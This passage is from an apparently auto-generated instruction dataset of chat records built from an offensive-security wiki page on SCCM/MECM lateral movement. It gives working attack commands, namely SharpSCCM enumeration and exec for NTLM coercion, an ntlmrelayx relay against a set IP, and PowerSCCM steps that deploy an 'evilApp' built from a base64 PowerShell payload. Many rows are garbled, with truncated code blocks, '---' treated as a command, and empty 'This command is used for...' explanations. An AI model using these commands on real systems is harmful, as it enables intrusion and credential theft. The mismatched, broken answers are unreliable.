"docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Applications and scripts deployment - Theory"}, {"role": "assistant", "content": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to application and script deployment in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - EXEC-1: App Deployment\n> - EXEC-2: Script Deployment"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Applications and scripts deployment - Theory", "response": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to application and script deployment in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - EXEC-1: App Deployment\n> - EXEC-2: Script Deployment", "metadata": {"corpus_index": 1010, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Applications and scripts deployment - Theory during a pentest?"}, {"role": "assistant", "content": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to application and script deployment in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - EXEC-1: App Deployment\n> - EXEC-2: Script Deployment"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Applications and scripts deployment - Theory during a pentest?", "response": "With administrative rights on the primary site server, applications and scripts can be deployed on target devices to move laterally across the network.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to application and script deployment in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - EXEC-1: App Deployment\n> - EXEC-2: Script Deployment", "metadata": {"corpus_index": 1010, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Applications and scripts deployment - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== SharpSCCM\n\nReferences:\n\n* https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867\n\nStep 1: Confirm Access permissions\n\n``powershell\nSharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames\n`\n\n---\nStep 2: Find target device\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Applications and scripts deployment - Practice", "response": "::: tabs\n\n=== SharpSCCM\n\nReferences:\n\n* https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867\n\nStep 1: Confirm Access permissions\n\n``powershell\nSharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames\n`\n\n---\nStep 2: Find target device\n\n``powershell", "metadata": {"corpus_index": 1011, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Applications and scripts deployment - Practice during a pentest?"}, {"role": "assistant", "content": "::: tabs\n\n=== SharpSCCM\n\nReferences:\n\n* https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867\n\nStep 1: Confirm Access permissions\n\n``powershell\nSharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames\n`\n\n---\nStep 2: Find target device\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Applications and scripts deployment - Practice during a pentest?", "response": "::: tabs\n\n=== SharpSCCM\n\nReferences:\n\n* https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867\n\nStep 1: Confirm Access permissions\n\n``powershell\nSharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames\n`\n\n---\nStep 2: Find target device\n\n``powershell", "metadata": {"corpus_index": 1011, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the SharpSCCM.exe command to applications and scripts deployment - practice"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the SharpSCCM.exe command to applications and scripts deployment - practice", "response": "SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames", "metadata": {"corpus_index": 1012, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpSCCM.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Applications and scripts deployment - Practice?"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Applications and scripts deployment - Practice?", "response": "SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames", "metadata": {"corpus_index": 1012, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames`?"}, {"role": "assistant", "content": "This command is used for applications and scripts deployment - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames`?", "response": "This command is used for applications and scripts deployment - practice. Practice", "metadata": {"corpus_index": 1012, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Applications and scripts deployment - CAUTION: This could be huge work?"}, {"role": "assistant", "content": "SharpSCCM.exe get devices -w \"Active=1 and Client=1\"\n``\n\n---\nStep 3: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Applications and scripts deployment - CAUTION: This could be huge work?", "response": "SharpSCCM.exe get devices -w \"Active=1 and Client=1\"\n``\n\n---\nStep 3: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)\n\n``bash", "metadata": {"corpus_index": 1013, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Applications and scripts deployment - CAUTION: This could be huge?"}, {"role": "assistant", "content": "SharpSCCM.exe get devices -w \"Active=1 and Client=1\"\n``\n\n---\nStep 3: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Applications and scripts deployment - CAUTION: This could be huge?", "response": "SharpSCCM.exe get devices -w \"Active=1 and Client=1\"\n``\n\n---\nStep 3: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)\n\n``bash", "metadata": {"corpus_index": 1013, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Applications and scripts deployment - CAUTION: This could be huge"}, {"role": "assistant", "content": "---\n**Step 3**: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Applications and scripts deployment - CAUTION: This could be huge", "response": "---\n**Step 3**: Deploy Application to target device\n\nIn this final step you can choose to either create an actual application to deploy to the target machine or just trigger an install from a remote UNC path in order to capture and relay an incoming NTLM authentication. Note the following:\n\n* Coercing an authentication might be stealthier (and requires less cleanup) than installing an application\n* To capture and relay NTLM credentials, the target device must support NTLM (very likely).\n* The neat part: The Authentication can be coerced using the primary user account of the device OR the device computer account (you can choose)", "metadata": {"corpus_index": 1014, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `---`?"}, {"role": "assistant", "content": "This command is used for applications and scripts deployment - caution: this could be huge. CAUTION: This could be huge"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `---`?", "response": "This command is used for applications and scripts deployment - caution: this could be huge. CAUTION: This could be huge", "metadata": {"corpus_index": 1014, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Applications and scripts deployment - ntlmrelayx targeting 10.250.2.179"}, {"role": "assistant", "content": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Applications and scripts deployment - ntlmrelayx targeting 10.250.2.179", "response": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179", "metadata": {"corpus_index": 1015, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Applications and scripts deployment - ntlmrelayx targeting 10.250.2.179"}, {"role": "assistant", "content": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Applications and scripts deployment - ntlmrelayx targeting 10.250.2.179", "response": "ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179", "metadata": {"corpus_index": 1015, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Run the attack in the context of penetration testing"}, {"role": "assistant", "content": "SharpSCCM.exe exec -rid $RESOURCE_ID -r $TARGET\n``\n\nNote that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with PowerSCCM (Powershell).\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Run the attack in the context of penetration testing", "response": "SharpSCCM.exe exec -rid $RESOURCE_ID -r $TARGET\n``\n\nNote that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with PowerSCCM (Powershell).\n\n``powershell", "metadata": {"corpus_index": 1016, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Run the attack"}, {"role": "assistant", "content": "SharpSCCM.exe exec -rid $RESOURCE_ID -r $TARGET\n``\n\nNote that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with PowerSCCM (Powershell).\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Run the attack", "response": "SharpSCCM.exe exec -rid $RESOURCE_ID -r $TARGET\n``\n\nNote that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with PowerSCCM (Powershell).\n\n``powershell", "metadata": {"corpus_index": 1016, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Note command to run the attack"}, {"role": "assistant", "content": "Note that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with [PowerSCCM](https://github.com/PowerShellMafia/PowerSCCM) (Powershell)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Note command to run the attack", "response": "Note that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with [PowerSCCM](https://github.com/PowerShellMafia/PowerSCCM) (Powershell).", "metadata": {"corpus_index": 1017, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Note"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Run the attack?"}, {"role": "assistant", "content": "Note that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with [PowerSCCM](https://github.com/PowerShellMafia/PowerSCCM) (Powershell)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Run the attack?", "response": "Note that the incoming authentication requests might take a while (couple minutes) to roll in...\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Trigger_Deployment.png>)\n\n![](<../assets/SCCM_Lateral_Movement_Execution_Step3_Capture_Authentication.png>)\n\n=== PowerSCCM\n\nWith sufficient rights on the central SCCM server (sufficient rights on WMI), it is possible to deploy applications or scripts on the Active Directory machines with [PowerSCCM](https://github.com/PowerShellMafia/PowerSCCM) (Powershell).", "metadata": {"corpus_index": 1017, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Note that the incoming authentication requests might take a while (couple minutes) to roll in...`?"}, {"role": "assistant", "content": "This command is used for run the attack. Run the attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Note that the incoming authentication requests might take a while (couple minutes) to roll in...`?", "response": "This command is used for run the attack. Run the attack", "metadata": {"corpus_index": 1017, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Create a SCCM Session via WMI with the Site Code"}, {"role": "assistant", "content": "Find-SccmSiteCode -ComputerName SCCMServer\nNew-SccmSession -ComputerName SCCMServer -SiteCode $SITE_CODE -ConnectionType WMI"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Create a SCCM Session via WMI with the Site Code", "response": "Find-SccmSiteCode -ComputerName SCCMServer\nNew-SccmSession -ComputerName SCCMServer -SiteCode $SITE_CODE -ConnectionType WMI", "metadata": {"corpus_index": 1018, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Create a SCCM Session via WMI with the Site Code"}, {"role": "assistant", "content": "Find-SccmSiteCode -ComputerName SCCMServer\nNew-SccmSession -ComputerName SCCMServer -SiteCode $SITE_CODE -ConnectionType WMI"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Create a SCCM Session via WMI with the Site Code", "response": "Find-SccmSiteCode -ComputerName SCCMServer\nNew-SccmSession -ComputerName SCCMServer -SiteCode $SITE_CODE -ConnectionType WMI", "metadata": {"corpus_index": 1018, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Create a computer collection?"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmCollection -CollectionName \"collection\" -CollectionType \"Device\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Create a computer collection?", "response": "Get-SccmSession | New-SccmCollection -CollectionName \"collection\" -CollectionType \"Device\"", "metadata": {"corpus_index": 1019, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Create a computer collection"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmCollection -CollectionName \"collection\" -CollectionType \"Device\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Create a computer collection", "response": "Get-SccmSession | New-SccmCollection -CollectionName \"collection\" -CollectionType \"Device\"", "metadata": {"corpus_index": 1019, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Add computers to the collection work?"}, {"role": "assistant", "content": "Get-SccmSession | Add-SccmDeviceToCollection -ComputerNameToAdd \"target\" -CollectionName \"collection\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Add computers to the collection work?", "response": "Get-SccmSession | Add-SccmDeviceToCollection -ComputerNameToAdd \"target\" -CollectionName \"collection\"", "metadata": {"corpus_index": 1020, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Add computers to the collection?"}, {"role": "assistant", "content": "Get-SccmSession | Add-SccmDeviceToCollection -ComputerNameToAdd \"target\" -CollectionName \"collection\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Add computers to the collection?", "response": "Get-SccmSession | Add-SccmDeviceToCollection -ComputerNameToAdd \"target\" -CollectionName \"collection\"", "metadata": {"corpus_index": 1020, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Create an application to deploy"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmApplication -ApplicationName \"evilApp\" -PowerShellB64 $BASE64_PAYLOAD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Create an application to deploy", "response": "Get-SccmSession | New-SccmApplication -ApplicationName \"evilApp\" -PowerShellB64 $BASE64_PAYLOAD", "metadata": {"corpus_index": 1021, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk 